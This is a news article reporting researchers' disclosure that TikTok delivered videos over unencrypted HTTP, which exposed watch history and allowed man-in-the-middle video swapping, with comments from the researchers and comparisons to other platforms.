Picture this: you’re scrolling through your TikTok feed one day and all of a sudden, you notice a video that you did not upload posted to your account.
It’s very possible, as a team of software developers discovered a vulnerability on the viral social video platform that allows an attacker to swap videos on any TikTok account.
In a sharing their findings, developers Tommy Mysk and Talal Haj Bakry explain that TikTok uses Content Delivery Networks, or CDNs, in order to more effectively transfer their data around the world. To improve performance, these CDNs transfer the data over HTTP.
The problem with choosing unencrypted HTTP over the more secure HTTPS is that it puts users’ privacy at risk.
“Any router between the TikTok app and TikTok’s CDNs can easily list all the videos that a user has downloaded and watched, exposing their watch history,” writes Mysk and Bakry. “Public Wifi operators, Internet Service Providers, and intelligence agencies can collect this data without much effort.”
While Apple and Google have both moved to require apps to use encrypted HTTPS, there are some exceptions for developers who choose to use HTTP.
Because TikTok transfers data such as videos and profile photos via HTTP, the developers found it was susceptible to man-in-the-middle attacks. Basically, they could alter the content in transmission and swap out a real video on an account with a fake one of their choosing.
The developers provided an example to show just how problematic this issue can be by inflicting a DNS attack on a local network.
Using the vulnerability they discovered, the duo uploaded a video sharing coronavirus misinformation and injected it into the World Health Organization’s TikTok account so it looked like one of the organization’s own videos. The team was successful in using the same process to show fraudulent uploads on other TikTok verified accounts, like the Red Cross and the video platform’s very own official profile.
In order to do this the duo needed to trick the TikTok app to direct to a fake server, they had set up that mimicked TikTok’s CDN servers.
“This can be achieved by actors who have direct access to the routers that users are connected to,” they explain in their post.
The result means to see the changes made by Mysk and Bakry with the TikTok app, a user would need to be connected to their home router. To be clear, the video swapping isn’t occurring on TikTok’s servers. But that doesn’t mean a malicious actor couldn’t use this method to cause real harm.
“If a popular DNS server was hacked to include a corrupt DNS record…misleading information, fake news, or abusive videos would be viewed on a large scale,” the developers explained. “This is not completely impossible.”
Developer Tommy Mysk confirmed to Mashable that the choice to transfer data via HTTP over HTTPS sets TikTok apart from most of its high-profile competitors.
“I just tested them all: Facebook, Instagram, YouTube, Twitter, Snapchat,” Mysk said in a message to Mashable. “They have ZERO HTTP traces. They transfer all of their data using HTTPS.”
Earlier this year, cybersecurity firm Check Point a number of security flaws in the TikTok app, including one that allowed hackers to take control of a user’s account. The viral video platform moved to fix them. Shortly after, the team of Mysk and Bakry another TikTok security issue that allowed the app to spy on your iPhone clipboard history.
TikTok has always had to prove itself as a safe platform for its users due to its to its China-based parent company, Bytedance. Some U.S. government workers have even been from using the app. This latest security issue surely isn’t good news for the company.